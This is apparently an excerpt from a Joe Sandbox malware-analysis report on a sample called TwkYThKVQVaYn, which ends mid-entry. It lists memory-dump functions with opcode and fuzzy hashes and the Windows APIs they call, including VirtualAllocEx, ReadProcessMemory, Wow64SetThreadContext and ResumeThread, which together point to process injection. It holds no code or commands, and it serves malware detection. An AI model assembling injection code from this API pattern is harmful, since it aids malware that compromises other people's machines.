Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6e10000_TwkYThKVQVaYn.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 4f95cbce7f1f6ad2ec924a4540dbb3aec4a9e7b3fb303100f40203fc57606c08
Instruction ID: 12fcca252de61acb2d869d15634ec0efe1b1cab2973159e11fe1a258f7afe6da
Opcode Fuzzy Hash: 4f95cbce7f1f6ad2ec924a4540dbb3aec4a9e7b3fb303100f40203fc57606c08
Instruction Fuzzy Hash: 8F215971D003099FDB10CFAAC4827EEBBF4EF48610F148429D419AB240DB799544CFA5

Function 026CB730 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,026CD5E6,?,?,?,?,?), ref: 026CD6A7

Memory Dump Source

Source File: 0000000B.00000002.2276258072.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26c0000_TwkYThKVQVaYn.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: feda7430654575419801a9f18a4b7b534d7c088fb9bcf37850a61ced24a76060
Instruction ID: 85280fee158c26089f9710542a1adbe3eb7fe805f5a80973def57f61879bef25
Opcode Fuzzy Hash: feda7430654575419801a9f18a4b7b534d7c088fb9bcf37850a61ced24a76060
Instruction Fuzzy Hash: E62116B5900348EFDB10DF9AD584AEEBBF8EB48310F24805AE959A7310D374A940CFA4

Function 06E17721 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06E177A8

Memory Dump Source

Source File: 0000000B.00000002.2332434552.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6e10000_TwkYThKVQVaYn.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: cf7b4dc3ecf0ff5a49b68f705b46809bbfac34a7173e01a937676d84c2430eb6
Instruction ID: e74d09fefe9a374bca381dd46fecf7c2b022fde5fed06bfea46149ea8ff8cc9a
Opcode Fuzzy Hash: cf7b4dc3ecf0ff5a49b68f705b46809bbfac34a7173e01a937676d84c2430eb6
Instruction Fuzzy Hash: 032122719003499FDB10DFAAC881AEEBBF5FF88310F14842AE959A7240D7389510CBA4

Function 06E17728 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06E177A8

Memory Dump Source

Source File: 0000000B.00000002.2332434552.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6e10000_TwkYThKVQVaYn.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 82728915ffba07ee40e9600ee3a61f9053e724871fac5cf835cb3d89b6ab7d17
Instruction ID: d4778c7c92a2a0a8f641e953d8cf825d0b3af140fd946a20637e7c088ded39c6
Opcode Fuzzy Hash: 82728915ffba07ee40e9600ee3a61f9053e724871fac5cf835cb3d89b6ab7d17
Instruction Fuzzy Hash: 772114718003499FDF10DFAAC881BEEBBF5FF88710F14842AE958A7240C7799900CBA4

Function 06E17068 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06E170E6

Memory Dump Source

Source File: 0000000B.00000002.2332434552.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6e10000_TwkYThKVQVaYn.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 24aaa1a5877dc9037c0484954c8926c2a245d2e0fad7ebffff3e2f51d690b4c2
Instruction ID: 893d426da01afc6a8bcb53190ce0741abf6f543e9d49ac0e46d7e31769081775
Opcode Fuzzy Hash: 24aaa1a5877dc9037c0484954c8926c2a245d2e0fad7ebffff3e2f51d690b4c2
Instruction Fuzzy Hash: 27213571D003098FDB10DFAAC885BEEBBF4EF88714F14842AD559AB240DB799944CFA5

Function 026CD618 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,026CD5E6,?,?,?,?,?), ref: 026CD6A7

Memory Dump Source

Source File: 0000000B.00000002.2276258072.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26c0000_TwkYThKVQVaYn.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: bc36c5e06a6f5bdc08e1634b46941be49776dd59e7e48152d7fba6869caba963
Instruction ID: 47c9672a8886f4afca0b841ec82f72de080e9b73e69180762a8cf559ffe8888c
Opcode Fuzzy Hash: bc36c5e06a6f5bdc08e1634b46941be49776dd59e7e48152d7fba6869caba963
Instruction Fuzzy Hash: 4D21E2B5900209DFDB00CFAAD584AEEBBF5FB48310F24806AE958A7350C378A954CF65

Function 06E17570 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06E175E6

Memory Dump Source

Source File: 0000000B.00000002.2332434552.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6e10000_TwkYThKVQVaYn.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 280ea0651054e2b5645a3fd7bbfbbcf7cc3699d71c05a8338d79036b32057da9
Instruction ID: 2dc79f92ee4d443c8f6ee3c1c849b283966e04180e4a9d17267023ee4643152d
Opcode Fuzzy Hash: 280ea0651054e2b5645a3fd7bbfbbcf7cc3699d71c05a8338d79036b32057da9
Instruction Fuzzy Hash: 081144718003499FDF10DFAAC845BEEBFF5AF88720F24842AE519AB250C7359554CBA1

Function 026CA108 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,026CB019,00000800,00000000,00000000), ref: 026CB22A

Memory Dump Source

Source File: 0000000B.00000002.2276258072.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26c0000_TwkYThKVQVaYn.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 489b938ca0ff6328508fd2489f3ef3011e611f9f9fb39d513867b2c3d807ddb1
Instruction ID: 40146a5ea6cddc6467ddca124759d213a49534c3ea4607a52594a555acfe0466
Opcode Fuzzy Hash: 489b938ca0ff6328508fd2489f3ef3011e611f9f9fb39d513867b2c3d807ddb1
Instruction Fuzzy Hash: 0A1103B6900249DFDB10DF9AD485BAEFBF8EB48314F10842EE519A7300C379A545CFA5

Function 026CB1B9 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,026CB019,00000800,00000000,00000000), ref: 026CB22A

Memory Dump Source

Source File: 0000000B.00000002.2276258072.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26c0000_TwkYThKVQVaYn.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6e95e364bac0cbcfcf5f67de7e0138c403ade83195a692433cd22699a760ec96
Instruction ID: f60222961908d75c784657ac157e7fb61cd47fc6188e5c6d5e99506fe02b1821
Opcode Fuzzy Hash: 6e95e364bac0cbcfcf5f67de7e0138c403ade83195a692433cd22699a760ec96
Instruction Fuzzy Hash: 161103B6900349CFDB10CFAAD484AEEFBF4EB48714F10842ED519A7200C779A545CFA5

Function 06E17578 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06E175E6

Memory Dump Source

Source File: 0000000B.00000002.2332434552.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6e10000_TwkYThKVQVaYn.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9d60c11b5dc77336e257554b575b166777dea74b14ad1b521d50cde6e8ef3026
Instruction ID: 898e5a808c80156b6271c4caab6e5c721244293f311d937585db15dc2b609fe6
Opcode Fuzzy Hash: 9d60c11b5dc77336e257554b575b166777dea74b14ad1b521d50cde6e8ef3026
Instruction Fuzzy Hash: 1A1112718003499FDF10DFAAC845BDEBBF5AF88720F248419E519AB250CB79A940CBA4

Function 06E16FB1 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06E1701A

Memory Dump Source

Source File: 0000000B.00000002.2332434552.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6e10000_TwkYThKVQVaYn.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: af22e4dc401397d727b967074acd5c8ef0bee9267b4e76dde375ecfa12cda982
Instruction ID: a14e9e077da7cd11ca3a32cca542ef3b19802fff6f3704b227cd2ed9591ce5a3
Opcode Fuzzy Hash: af22e4dc401397d727b967074acd5c8ef0bee9267b4e76dde375ecfa12cda982
Instruction Fuzzy Hash: 3B115871D00348CFDB20DFAAC84679FFBF9AF88610F248419D519AB240DB39A544CBA5

Function 06E16FB8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06E1701A

Memory Dump Source

Source File: 0000000B.00000002.2332434552.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6e10000_TwkYThKVQVaYn.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: e1b89c67f6295456651aad3e13d3813eec9625748b10e746a4a6bfebf6b61cc1
Instruction ID: 3f8821c1f12a3f6d4b3e97a00ebb3f42c7334dbe1a4041eec01e54c4259ab23c
Opcode Fuzzy Hash: e1b89c67f6295456651aad3e13d3813eec9625748b10e746a4a6bfebf6b61cc1
Instruction Fuzzy Hash: 84112571D00349CFDB20DFAAC84579EFBF9AF88624F248419D519A7240CB79A944CBA4

Function 06E19590 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06E1B2DD

Memory Dump Source

Source File: 0000000B.00000002.2332434552.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6e10000_TwkYThKVQVaYn.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: b6ae59b21ddf53b5d99116f870ebabdec369b5bc65b80f2d384b35e805b1513e
Instruction ID: 8481e73255e2614f7b19e0345c43ff7a9c0fb1f36b5c506669c95c9b27525807
Opcode Fuzzy Hash: b6ae59b21ddf53b5d99116f870ebabdec369b5bc65b80f2d384b35e805b1513e
Instruction Fuzzy Hash: 9111F2B5800349DFDB50DF9AC885BDEBBF8EB48314F108459E558A7200C375A944CFA5

Function 06E1B278 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06E1B2DD

Memory Dump Source

Source File: 0000000B.00000002.2332434552.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6e10000_TwkYThKVQVaYn.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 7e98e129504e3f994fc4213bb708a87e33fbef5f364b3d4a8e8ae8a2ac2ddcb3
Instruction ID: 36cdf9f108726d13a6cf6707db6c51e7a4839e8dad2b40276de5aaa7a1513ebb
Opcode Fuzzy Hash: 7e98e129504e3f994fc4213bb708a87e33fbef5f364b3d4a8e8ae8a2ac2ddcb3
Instruction Fuzzy Hash: 9A11F2B5800349DFDB50DF9AD485BDEBBF4EB88314F10845AE558A7600C375AA44CFA5

Function 026CAF38 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 026CAF9E

Memory Dump Source

Source File: 0000000B.00000002.2276258072.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26c0000_TwkYThKVQVaYn.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 863fcf7463eee86722b5da9b3088e98ee16e994cbfdc9050b0f6cb3655f5b8ec
Instruction ID: 2abeb0c4c1bb4311e7434b958552deb4c734bced030b9617b3945472bb0162f1
Opcode Fuzzy Hash: 863fcf7463eee86722b5da9b3088e98ee16e994cbfdc9050b0f6cb3655f5b8ec
Instruction Fuzzy Hash: 69110FB6C00649CFDB10DF9AD544BDEFBF4EB88214F20845AD868A7200C379A945CFA5

Function 05407E20 Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

O, xrefs: 05407EAF

Memory Dump Source

Source File: 0000000B.00000002.2331846094.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5400000_TwkYThKVQVaYn.jbxd

Similarity

API ID:
String ID: O
API String ID: 0-878818188
Opcode ID: a64eeb7adf1af0400f266d28da48f0ad72d130b11e7aca347dc07937b25abda0
Instruction ID: 6ed623a235e8bcb8c498e3c645c2e3574bca30a4415e7df0a95c09e124ecc5e6
Opcode Fuzzy Hash: a64eeb7adf1af0400f266d28da48f0ad72d130b11e7aca347dc07937b25abda0
Instruction Fuzzy Hash: B411AF71A00604CFC710DF78C944AABBBF6EF89304B04886DD159DB720EB35E905C790

Function 05407E30 Relevance: 1.3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

Strings

O, xrefs: 05407EAF

Memory Dump Source

Source File: 0000000B.00000002.2331846094.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5400000_TwkYThKVQVaYn.jbxd

Similarity

API ID:
String ID: O
API String ID: 0-878818188
Opcode ID: 1ff22f0b64cf0caf04064f2fb9670200353bf405e47c012f22183e29e4e7bee2
Instruction ID: 578f16fba11f10643ae6d2e9e1292bbdf042d1abaca47d32d510fd6e519c0ad8
Opcode Fuzzy Hash: 1ff22f0b64cf0caf04064f2fb9670200353bf405e47c012f22183e29e4e7bee2
Instruction Fuzzy Hash: A0115E70A007048FD724DF69D84496BBBFAEF89304B40896DD5599B360EB35E905C7A1

Function 05408720 Relevance: .8, Instructions: 777COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2331846094.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5400000_TwkYThKVQVaYn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27cd3cded2aeb675e1475b7d9c52452d798889aa1e9b7a872c4213bec66b312b
Instruction ID: d0632b3b22b00701b50da040c137e7c9ef78e6b26fba577ee05c12fa1bf6aa8e
Opcode Fuzzy Hash: 27cd3cded2aeb675e1475b7d9c52452d798889aa1e9b7a872c4213bec66b312b
Instruction Fuzzy Hash: AB62D070E00F418BDB749BA595887EEBB91BB45340F205E6FD0ABDB792DB3494818B43

Function 05408760 Relevance: .5, Instructions: 453COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2331846094.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5400000_TwkYThKVQVaYn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2616aac084e9f99b126ed235b50a59032f9f13d92250a1134130589ffe041fef
Instruction ID: f83c0a15ff4fa01441986ca36c7d22586bc10a8ea18d4cffa4d09b0e29d82773
Opcode Fuzzy Hash: 2616aac084e9f99b126ed235b50a59032f9f13d92250a1134130589ffe041fef
Instruction Fuzzy Hash: 76124CB0A05F4287DA785BA585846DFF790BB09340F309D6FC0FB9A3A6E73494858B46

Function 05407B43 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2331846094.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5400000_TwkYThKVQVaYn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a556d1f91f872e69e9266d60e230711b99763f68dc5c3d5397f1525e1874d912
Instruction ID: 0effdd6a7d6372e0fb0ec2b2124f9d561248b32c776828b876b6e2d0cbd94dbb
Opcode Fuzzy Hash: a556d1f91f872e69e9266d60e230711b99763f68dc5c3d5397f1525e1874d912
Instruction Fuzzy Hash: CB813674700701CFD745EF78D894AAABBB2FF89310B1189A9E51ACB361DB70AD45CB90

Function 0540B7A4 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2331846094.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5400000_TwkYThKVQVaYn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ac396676ab8a602926912c09fa3d64223319af8772604edddbf2600c2d35ba8
Instruction ID: e767747011686e7fc0259ad73f37f85fce16e996e6274582d2262ce9779c35d4
Opcode Fuzzy Hash: 8ac396676ab8a602926912c09fa3d64223319af8772604edddbf2600c2d35ba8
Instruction Fuzzy Hash: 25618F74D59218CFDB20CFA9C884AEDBBB6FB09310F246466E859E7391D7309982CF04

Function 0540CF3C Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2331846094.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5400000_TwkYThKVQVaYn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6903c1175e746c4cd3a9df0f5dded179a80b620ad79f9a79a83c2e669bba96a5
Instruction ID: 7cbc19ad821cea6ed623a14abab20a566c0d29f8dc5d9838e14087b5ead964fd
Opcode Fuzzy Hash: 6903c1175e746c4cd3a9df0f5dded179a80b620ad79f9a79a83c2e669bba96a5
Instruction Fuzzy Hash: E151C3B1A043489FDB01DFA8D844AEEBFF5EF46210F1541ABD845E7292D7349D06CB61

Function 05409DE8 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2331846094.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5400000_TwkYThKVQVaYn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dcc753d3f37b1e03a56898890b5d98b7c4c1b7728bbac0fb4c18fdfa0c85861
Instruction ID: 19e86ddec484827fc3aa04ab567d72334c57cfe4a477a6df3b7e1a3d5aabf101
Opcode Fuzzy Hash: 5dcc753d3f37b1e03a56898890b5d98b7c4c1b7728bbac0fb4c18fdfa0c85861
Instruction Fuzzy Hash: F3519271B002468FDB11DBB9D8849BEBBB7EFC5220B258A6AE419D7394EB309D058750

Function 0540A1A4 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2331846094.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5400000_TwkYThKVQVaYn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecbb4c0544cdf16708ab7eba8009d9a5097d2333333c569703109f07d8c13c33
Instruction ID: df42c88067719470a0257e19f2712829f58351aafb3a33d9a157232a9d698b0b
Opcode Fuzzy Hash: ecbb4c0544cdf16708ab7eba8009d9a5097d2333333c569703109f07d8c13c33
Instruction Fuzzy Hash: 6C413D34B00308DFEB589A79D864B6EBBB3AF88710F248079E506DB3D5DE718C418B90

Function 0540AE38 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2331846094.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5400000_TwkYThKVQVaYn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f44c98cba9cd74fed6b6e64492f33f56f595ff788545517b40f14fbac5b393df
Instruction ID: a43e6cca94e7a14d2e52548c4e4414f716ffb39f8c094de6b2a7a9f53fb3dca6
Opcode Fuzzy Hash: f44c98cba9cd74fed6b6e64492f33f56f595ff788545517b40f14fbac5b393df
Instruction Fuzzy Hash: 29416CB5E54309DBDB01DFA5D8809EEBBBAFB49200F206476E906E7381D7309A41CF90

Function 0540ABD8 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2331846094.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5400000_TwkYThKVQVaYn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e975fe16916f2881bf6e2bf82e70ad5aad5c1a2f500a31ef568067e8b19d7f0e
Instruction ID: ad8fe6752654bf9265c808afedd62cfceb29cb0f6ebe0f2c395c742dd1b24ce6
Opcode Fuzzy Hash: e975fe16916f2881bf6e2bf82e70ad5aad5c1a2f500a31ef568067e8b19d7f0e
Instruction Fuzzy Hash: C2417E7091C715CFD704CF56E4849FABBBABF4E310B5AA4A6D0199B3A2DB309952CB00

Function 0540ABE8 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2331846094.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5400000_TwkYThKVQVaYn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ead865639b4e8fb19c54f973be12ae0ba1f051c21561f171c17b96a8e8070511
Instruction ID: 8c87dabee1d8c854db387dbe5e7f99d524c5f002707fca2b66fe4b1b8f39af6e
Opcode Fuzzy Hash: ead865639b4e8fb19c54f973be12ae0ba1f051c21561f171c17b96a8e8070511
Instruction Fuzzy Hash: AC415B70E1C714CFD704DF56D4849FABBFABF4D310B56A4A6D01A9B2A5DB309952CB00

Function 0540A723 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2331846094.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5400000_TwkYThKVQVaYn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47ade4a79b1eefcd144901f32cc4ddda07faf9094154df4f2e05b0c28a37fee4
Instruction ID: 74a682bf422afb4917452d5f697beaf1f265da485d3b0395503f139ae857cafe
Opcode Fuzzy Hash: 47ade4a79b1eefcd144901f32cc4ddda07faf9094154df4f2e05b0c28a37fee4
Instruction Fuzzy Hash: 6731E633A043508FCB29C76BD950AF6BBE29B81615729ACBBE497C7296C134EC43C751

Function 0540E3A8 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2331846094.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5400000_TwkYThKVQVaYn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0f4b1d8f158ef2177b4bb98344660ce1e99a65f24e9dace69661315de73eae0
Instruction ID: 7a72ed60c406340670e7f07b1029133052778a891120e5d964f8395b3808fb62
Opcode Fuzzy Hash: a0f4b1d8f158ef2177b4bb98344660ce1e99a65f24e9dace69661315de73eae0
Instruction Fuzzy Hash: 2031B671E04204DADB50DEA588557FEBBBBEF88210F245C7BD506A72C4DA3488329B91

Function 0540E3B8 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2331846094.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5400000_TwkYThKVQVaYn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dfe5b811f94a0ace849e9e5348041ae7622409c207d0ecb580295b6d9d1b1b1
Instruction ID: 47f9337d887e77adfd9ec7061cb239438003f4f8246f4547edc16a6ce3c693f6
Opcode Fuzzy Hash: 2dfe5b811f94a0ace849e9e5348041ae7622409c207d0ecb580295b6d9d1b1b1
Instruction Fuzzy Hash: 5321D731E04204CADB50DEA588446FFBBBBEBC8210F345C3BD502A72C4DA344832DB91

Function 0540AD28 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2331846094.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5400000_TwkYThKVQVaYn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 463e6672337a528c174be3e05002b1ec672a7bd27fe72b31c774d29a968c8b58
Instruction ID: f3671cb55f8783b452dd03d53c36c5c6d3a406b9a5ab4f7747908731376d2dd9
Opcode Fuzzy Hash: 463e6672337a528c174be3e05002b1ec672a7bd27fe72b31c774d29a968c8b58
Instruction Fuzzy Hash: 64314E7091830ACFDB40DF6AE5809FEBBF6BF09201B6060A2D449E7391DB30DA52CB51

Function 0540CF4C Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2331846094.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5400000_TwkYThKVQVaYn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed33055f11b90501a8901574e5cf849f2256523aa890d018ca805a37b5391d5b
Instruction ID: 5f2923b6f755034f2e4cb5bdb3b3ac308b9424314071c18ef13089f6a369d6d7
Opcode Fuzzy Hash: ed33055f11b90501a8901574e5cf849f2256523aa890d018ca805a37b5391d5b
Instruction Fuzzy Hash: ED21D571A09348AFDB06DFB4DC549EE7FB5EF46200B1641EBD804DB2A2EA349D0AC751

Function 024ED3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2240650103.00000000024ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 024ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_24ed000_TwkYThKVQVaYn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89e0167b2787614f61573b78e607bd90c3ad150300dbe798d571e98a33efe4b8
Instruction ID: d5d341c0f38cf744294af383d0351be0c0ab61ab3652157eb385d2029c420669
Opcode Fuzzy Hash: 89e0167b2787614f61573b78e607bd90c3ad150300dbe798d571e98a33efe4b8
Instruction Fuzzy Hash: 2E210671900204EFEF09DF14D9C0B16BB69FF94315F20C56AE90A0B356C336E456CAA2

Function 024FD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2246899416.00000000024FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 024FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_24fd000_TwkYThKVQVaYn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29663337cfc0b2dc552f5163a77bf8ac50389289124fdfe724ecbee00ef4ef97
Instruction ID: c2f12d298adc6fa2157a4ef20669e63ad39b4af60470f9b18097d4771c571461
Opcode Fuzzy Hash: 29663337cfc0b2dc552f5163a77bf8ac50389289124fdfe724ecbee00ef4ef97
Instruction Fuzzy Hash: 6421D371A04204EFDB54DF24D980B16BB65EBC4318F20C56EDA0A4B746C336D447CE62

Function 024FD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2246899416.00000000024FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 024FD000, based on PE: false

Joe Sandbox IDA Plugin

